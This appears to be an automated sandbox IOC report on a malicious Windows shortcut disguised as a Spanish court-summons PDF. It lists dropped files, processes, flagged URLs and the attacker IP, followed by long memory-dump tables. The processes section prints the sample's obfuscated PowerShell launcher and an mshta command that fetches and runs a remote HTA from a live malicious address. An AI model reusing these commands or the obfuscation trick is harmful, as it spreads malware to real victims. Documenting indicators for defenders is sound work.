IOC Report
DEMANDA JUICIO JUZGADO01.pdf.lnk

loading gif

Files

File Path
Type
Category
Malicious
DEMANDA JUICIO JUZGADO01.pdf.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xbbb18c1f, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cn0cqse.ejj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cibrx2n2.yuc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRVNTY32EM2YMY4GGXOO.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c40edd991180589a.customDestinations-ms (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
http://94.154
unknown
malicious
http://94.154.172.166/p
unknown
malicious
http://94.154.172.166/pcz
unknown
malicious
http://94.154.172.166/pczt/roy
unknown
malicious
http://94.154.172.166/pczt/royyyas.
unknown
malicious
http://94.154.
unknown
malicious
http://94.154.172.166/pczt/ro
unknown
malicious
http://94.154.172.166/pczt/royyyas.hta
94.154.172.166
malicious
http://94.154.17
unknown
malicious
http://94.154.1
unknown
malicious
http://94.154.172.
unknown
malicious
http://94.154.172.1
unknown
malicious
http://94.154.172.166/pczt/r
unknown
malicious
http://94.154.172
unknown
malicious
http://94.154.172.166/pczt/
unknown
malicious
http://94.154.172.166/pczt/royyy
unknown
malicious
http://94.154.172.166/
unknown
malicious
http://94.15
unknown
malicious
http://94.154.172.166/pczt
unknown
malicious
http://94.154.172.166/pc
unknown
malicious
http://94.154.172.166/pczt/royyyas.ht
unknown
malicious
http://94.154.172.16
unknown
malicious
http://94.154.172.166/pczt/royy
unknown
malicious
http://94.154.172.166/pczt/royyyas
unknown
malicious
http://94.154.172.166
unknown
malicious
http://94.154.172.166/pczt/royyyas.h
unknown
malicious
http://94.154.172.166/pczt/royyya
unknown
malicious
http://94.1
unknown
malicious
http://94.154.172.166/pczt/royyyas.htaC:
unknown
https://contoso.com/License
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://94.154.172.166/pczt/royyyas.hta_BROWSER_AP5;
unknown
http://94.154.172.166/pczt/royyyas.htata
unknown
http://94.154.172.166/pczt/royyyas.htaH
unknown
https://contoso.com/
unknown
https://go.micros-
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
http://94.154.172.166/pczt/royyyas.hta5
unknown
http://94.154.172.166/pczt/royyyas.hta3
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
http://94.154.172.166/pczt/royyyas.hta...ory
unknown
http://crl.ver)
unknown
https://github.com/Pester/Pester
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://aka.ms/pscore68
unknown
http://94.154.172.166/pczt/royyyas.hta...
unknown
https://oneget.org
unknown
There are 44 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172

IPs

IP
Domain
Country
Malicious
94.154.172.166
unknown
Germany
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
1D6B2C30000
trusted library allocation
page read and write
1D6ADFC4000
trusted library allocation
page read and write
256DAA00000
heap
page read and write
1760D015000
heap
page read and write
256DC9E1000
heap
page read and write
735E7E000
unkown
page readonly
1760C82B000
heap
page read and write
73647B000
stack
page read and write
1760D6A0000
trusted library allocation
page read and write
256DAA39000
heap
page read and write
B8E8DFE000
stack
page read and write
256DC530000
trusted library allocation
page read and write
1D6B0684000
heap
page read and write
17611CC0000
trusted library allocation
page read and write
D364F6000
stack
page read and write
17611E2D000
heap
page read and write
1760C800000
heap
page read and write
7FF848914000
trusted library allocation
page read and write
1D6B05FC000
heap
page read and write
1D6B05B2000
heap
page read and write
1760D11A000
heap
page read and write
1CEAC0E0000
heap
page read and write
256F4BF8000
heap
page read and write
256DCB80000
heap
page execute and read and write
17611EF2000
heap
page read and write
1CEAC3AB000
heap
page read and write
256F4CE7000
heap
page execute and read and write
735B7E000
unkown
page readonly
17611F04000
heap
page read and write
B8E907D000
stack
page read and write
17611E8D000
heap
page read and write
B8E933E000
stack
page read and write
1760D8D0000
trusted library section
page readonly
1D6AE4B2000
heap
page read and write
7FF8489C0000
trusted library allocation
page read and write
B8E9239000
stack
page read and write
1CEAC1C0000
heap
page read and write
256DCE03000
trusted library allocation
page read and write
7FF848B40000
trusted library allocation
page read and write
256DCC5B000
trusted library allocation
page read and write
256DAA9B000
heap
page read and write
1760D8A0000
trusted library section
page readonly
256ECD87000
trusted library allocation
page read and write
1CEAC393000
heap
page read and write
73737E000
unkown
page readonly
1D6AE4C9000
heap
page read and write
B8E8EFF000
stack
page read and write
1760D113000
heap
page read and write
256F4C34000
heap
page read and write
1760C8FE000
heap
page read and write
B8E92B9000
stack
page read and write
1D6ADF9C000
trusted library allocation
page read and write
1D6AE4C9000
heap
page read and write
1760D002000
heap
page read and write
1760C6C0000
heap
page read and write
73557E000
unkown
page readonly
B8E8D7D000
stack
page read and write
73587C000
stack
page read and write
1D6ADFAC000
trusted library allocation
page read and write
1CEAC3AD000
heap
page read and write
256DC5B5000
heap
page read and write
1760D540000
trusted library allocation
page read and write
1D6B05BC000
heap
page read and write
1D6AE034000
trusted library allocation
page read and write
7FF848B10000
trusted library allocation
page read and write
73657E000
unkown
page readonly
256DE8C3000
trusted library allocation
page read and write
17611DC0000
trusted library allocation
page read and write
17611C80000
trusted library allocation
page read and write
1D6B05DD000
heap
page read and write
1D6B2C00000
trusted library allocation
page read and write
1D6AE4C1000
heap
page read and write
1D6AE470000
heap
page read and write
1760C87C000
heap
page read and write
1D6ADFB0000
trusted library allocation
page read and write
7FF848C70000
trusted library allocation
page read and write
17612020000
remote allocation
page read and write
1760D890000
trusted library section
page readonly
7DF4CEEA0000
trusted library allocation
page readonly
17611CF3000
trusted library allocation
page read and write
1D6ADEB6000
heap
page read and write
1D6AE4D7000
heap
page read and write
1760C929000
heap
page read and write
256DC933000
trusted library allocation
page read and write
1D6B2C10000
heap
page readonly
17611D50000
trusted library allocation
page read and write
7FF848BC0000
trusted library allocation
page read and write
735FFE000
stack
page read and write
1D6B2BA0000
heap
page read and write
256DA9A0000
heap
page read and write
1D6ADFE0000
trusted library allocation
page read and write
1CEAC39B000
heap
page read and write
256F4CF0000
heap
page read and write
256DCBC0000
heap
page execute and read and write
256ECBD1000
trusted library allocation
page read and write
256DE57C000
trusted library allocation
page read and write
1CEAC270000
trusted library allocation
page read and write
1D6ADEA9000
heap
page read and write
256DD0EB000
trusted library allocation
page read and write
17611E41000
heap
page read and write
256DE7FE000
trusted library allocation
page read and write
D36F4E000
stack
page read and write
17611E58000
heap
page read and write
B8E90F8000
stack
page read and write
256F4C53000
heap
page read and write
1760C89E000
heap
page read and write
1CEAC250000
heap
page read and write
B8E953C000
stack
page read and write
1760D8B0000
trusted library section
page readonly
7FF848AC1000
trusted library allocation
page read and write
7FF848BF0000
trusted library allocation
page read and write
736B7E000
unkown
page readonly
7FF848BB0000
trusted library allocation
page read and write
D36B4E000
stack
page read and write
735EFE000
stack
page read and write
1D6B2C20000
trusted library allocation
page read and write
B8E8F7E000
stack
page read and write
7FF848BE0000
trusted library allocation
page read and write
256DA980000
heap
page read and write
1D6ADE90000
heap
page read and write
1CEAC2D7000
heap
page read and write
B8E8E7B000
stack
page read and write
1D6AE274000
heap
page read and write
17613000000
heap
page read and write
73607E000
unkown
page readonly
17611CC4000
trusted library allocation
page read and write
735A79000
stack
page read and write
73627E000
unkown
page readonly
1D6AE49F000
heap
page read and write
1D6AE044000
trusted library allocation
page read and write
256F4E15000
heap
page read and write
7FF848B50000
trusted library allocation
page read and write
1D6ADFA0000
trusted library allocation
page read and write
B8E8C7E000
stack
page read and write
1D6AE4C9000
heap
page read and write
1D6AE4C1000
heap
page read and write
1D6B05C0000
heap
page read and write
17611E00000
heap
page read and write
B8E913E000
stack
page read and write
1D6ADFD8000
trusted library allocation
page read and write
1CEAC294000
heap
page read and write
17611C80000
trusted library allocation
page read and write
1D6ADFD4000
trusted library allocation
page read and write
735F7E000
unkown
page readonly
7FF848AE0000
trusted library allocation
page execute and read and write
1760C872000
heap
page read and write
1D6ADEAE000
heap
page read and write
7FF848A30000
trusted library allocation
page execute and read and write
17611D60000
trusted library allocation
page read and write
1760D102000
heap
page read and write
1D6B05B0000
heap
page read and write
7FF848AD0000
trusted library allocation
page execute and read and write
1D6B2C23000
trusted library allocation
page read and write
17611C60000
trusted library allocation
page read and write
1D6AE4C2000
heap
page read and write
1760C822000
heap
page read and write
1760D000000
heap
page read and write
1D6ADFA8000
trusted library allocation
page read and write
1760C902000
heap
page read and write
7367FE000
stack
page read and write
1D6AE000000
trusted library allocation
page read and write
7368FE000
unkown
page readonly
256DC570000
heap
page readonly
256F4CB6000
heap
page read and write
1760C7D0000
trusted library allocation
page read and write
1D6ADFE4000
trusted library allocation
page read and write
256DE4F6000
trusted library allocation
page read and write
17611E10000
heap
page read and write
7362FE000
stack
page read and write
1760DC30000
trusted library allocation
page read and write
256F4C09000
heap
page read and write
1D6AE480000
heap
page read and write
7FF848BA0000
trusted library allocation
page read and write
73567E000
stack
page read and write
256F4DF0000
heap
page read and write
256DACC5000
heap
page read and write
1D6ADEB2000
heap
page read and write
736C7A000
stack
page read and write
256DAADF000
heap
page read and write
1760CFF0000
trusted library allocation
page read and write
1D6B067F000
heap
page read and write
1CEAC290000
heap
page read and write
256DA970000
heap
page read and write
256DAAE5000
heap
page read and write
7FF848C20000
trusted library allocation
page read and write
17611CB0000
trusted library allocation
page read and write
7FF848B70000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page read and write
17611EE5000
heap
page read and write
1CEAC326000
heap
page read and write
256DAA9F000
heap
page read and write
17611CF0000
trusted library allocation
page read and write
1D6ADF98000
trusted library allocation
page read and write
256DCBD1000
trusted library allocation
page read and write
1760D11A000
heap
page read and write
7FF848B20000
trusted library allocation
page read and write
734ECB000
stack
page read and write
1D6AE01C000
trusted library allocation
page read and write
1760C894000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
256F4C13000
heap
page read and write
1760C879000
heap
page read and write
7FF848920000
trusted library allocation
page read and write
7DF4CEEA1000
trusted library allocation
page execute read
7FF848AF2000
trusted library allocation
page read and write
17611E61000
heap
page read and write
B8E89C5000
stack
page read and write
1D6AE018000
trusted library allocation
page read and write
D36A4F000
stack
page read and write
17611EF6000
heap
page read and write
1D6ADFDC000
trusted library allocation
page read and write
1CEAC24E000
heap
page read and write
1D6B060C000
heap
page read and write
17611DD0000
trusted library allocation
page read and write
7FF848C10000
trusted library allocation
page read and write
1760C7A0000
heap
page read and write
73597E000
unkown
page readonly
B8E9F0E000
stack
page read and write
1D6B0688000
heap
page read and write
73577E000
unkown
page readonly
7FF8489F6000
trusted library allocation
page execute and read and write
7FF848930000
trusted library allocation
page read and write
1D6B05BA000
heap
page read and write
D36D4F000
stack
page read and write
1D6ADFD0000
trusted library allocation
page read and write
1760D100000
heap
page read and write
7FF848C50000
trusted library allocation
page read and write
7361FE000
stack
page read and write
73697E000
unkown
page readonly
256DDAEB000
trusted library allocation
page read and write
1D6B29A0000
heap
page read and write
256DC560000
trusted library allocation
page read and write
17611CA0000
trusted library allocation
page read and write
1CEAC2B0000
heap
page read and write
D36E4D000
stack
page read and write
1D6ADFF8000
trusted library allocation
page read and write
1D6ADFC0000
trusted library allocation
page read and write
256DC9D0000
heap
page read and write
17611E4E000
heap
page read and write
B8E8CFE000
stack
page read and write
D3674E000
stack
page read and write
17611E20000
heap
page read and write
7FF848AB0000
trusted library allocation
page read and write
7FF848912000
trusted library allocation
page read and write
7FF848B90000
trusted library allocation
page read and write
1760D201000
trusted library allocation
page read and write
736D7E000
unkown
page readonly
1CEAC366000
heap
page read and write
735C7B000
stack
page read and write
256DC930000
trusted library allocation
page read and write
1760D7B0000
trusted library allocation
page read and write
1CEAC2B8000
heap
page read and write
1D6B05F6000
heap
page read and write
7FF848B00000
trusted library allocation
page execute and read and write
1760C6A0000
heap
page read and write
73637E000
unkown
page readonly
736A7E000
stack
page read and write
17611EBE000
heap
page read and write
1CEAC356000
heap
page read and write
7FF848BD0000
trusted library allocation
page read and write
1D6AE4B9000
heap
page read and write
1CEAC29D000
heap
page read and write
D3684B000
stack
page read and write
1760C88D000
heap
page read and write
1D6AE4CC000
heap
page read and write
1D6B2092000
trusted library allocation
page read and write
17611C70000
trusted library allocation
page read and write
17611EEB000
heap
page read and write
1760C913000
heap
page read and write
1CEAC389000
heap
page read and write
256DE8C7000
trusted library allocation
page read and write
1760C877000
heap
page read and write
7FF84892B000
trusted library allocation
page read and write
17611EB7000
heap
page read and write
7FF848C40000
trusted library allocation
page read and write
7DF42F590000
trusted library allocation
page execute and read and write
1760D8C0000
trusted library section
page readonly
256F4CE0000
heap
page execute and read and write
1CEAC386000
heap
page read and write
7FF848913000
trusted library allocation
page execute and read and write
1D6B06B0000
trusted library section
page readonly
B8E94BF000
stack
page read and write
17612020000
remote allocation
page read and write
1D6AE270000
heap
page read and write
735D7E000
unkown
page readonly
1D6AE038000
trusted library allocation
page read and write
D3694E000
stack
page read and write
1D6ADFC8000
trusted library allocation
page read and write
256DA9E0000
heap
page read and write
1D6AE4C9000
heap
page read and write
1CEAC244000
heap
page read and write
1D6B060E000
heap
page read and write
B8E93BE000
stack
page read and write
256DAA9D000
heap
page read and write
1D6AE028000
trusted library allocation
page read and write
256DE521000
trusted library allocation
page read and write
B8E91B6000
stack
page read and write
1D6AE4C1000
heap
page read and write
1D6AE008000
trusted library allocation
page read and write
256DABD0000
heap
page read and write
256ECC44000
trusted library allocation
page read and write
1CEAC240000
heap
page read and write
256DAAB7000
heap
page read and write
7FF8489D0000
trusted library allocation
page execute and read and write
256DC580000
trusted library allocation
page read and write
17611E54000
heap
page read and write
7365FE000
stack
page read and write
17611CB0000
trusted library allocation
page read and write
B8E8FFE000
stack
page read and write
1760C85C000
heap
page read and write
1CEAC3A3000
heap
page read and write
1760C813000
heap
page read and write
1D6ADFB4000
trusted library allocation
page read and write
256DACC0000
heap
page read and write
1760CFC1000
trusted library allocation
page read and write
7FF848C60000
trusted library allocation
page read and write
17611C81000
trusted library allocation
page read and write
17612020000
remote allocation
page read and write
1D6ADE94000
heap
page read and write
256DC5B0000
heap
page read and write
1D6ADFF0000
trusted library allocation
page read and write
1D6ADFBC000
trusted library allocation
page read and write
17611D50000
trusted library allocation
page read and write
1760C843000
heap
page read and write
1D6ADFE9000
trusted library allocation
page read and write
7372FE000
stack
page read and write
256F4C55000
heap
page read and write
256DE2DF000
trusted library allocation
page read and write
B8E943E000
stack
page read and write
1CEAC1E0000
heap
page read and write
256F4D14000
heap
page read and write
1CEAC39D000
heap
page read and write
7FF848C00000
trusted library allocation
page read and write
735477000
stack
page read and write
256ECBE0000
trusted library allocation
page read and write
256DAA09000
heap
page read and write
7FF848B60000
trusted library allocation
page read and write
1D6AE4E3000
heap
page read and write
7FF8489CC000
trusted library allocation
page execute and read and write
256F4BD0000
heap
page read and write
1760D8E0000
trusted library section
page readonly
256F4CB4000
heap
page read and write
17611DE0000
trusted library allocation
page read and write
1D6AE010000
trusted library allocation
page read and write
1760C88F000
heap
page read and write
1D6B29D4000
heap
page read and write
D36C4F000
stack
page read and write
1760C8B0000
heap
page read and write
D3704B000
stack
page read and write
256DAA97000
heap
page read and write
17611DB0000
trusted library allocation
page read and write
735DFE000
stack
page read and write
7FF84891D000
trusted library allocation
page execute and read and write
7FF848ACA000
trusted library allocation
page read and write
1D6B05B6000
heap
page read and write
1D6B2C00000
trusted library allocation
page read and write
1D6AE4B6000
heap
page read and write
1760C7E0000
trusted library section
page read and write
1CEAC375000
heap
page read and write
1D6AE048000
trusted library allocation
page read and write
1CEAC260000
trusted library allocation
page read and write
17611F02000
heap
page read and write
73677E000
stack
page read and write
73667E000
unkown
page readonly
256F4D11000
heap
page read and write
1D6AE4C3000
heap
page read and write
7FF8489C6000
trusted library allocation
page read and write
17611DD0000
trusted library allocation
page read and write
7FF848B80000
trusted library allocation
page read and write
7DF4CEEB1000
trusted library allocation
page execute read
256F4CAC000
heap
page read and write
1CEAC3A9000
heap
page read and write
1D6AE4E2000
heap
page read and write
1D6AE180000
heap
page read and write
There are 364 hidden memdumps, click here to show them.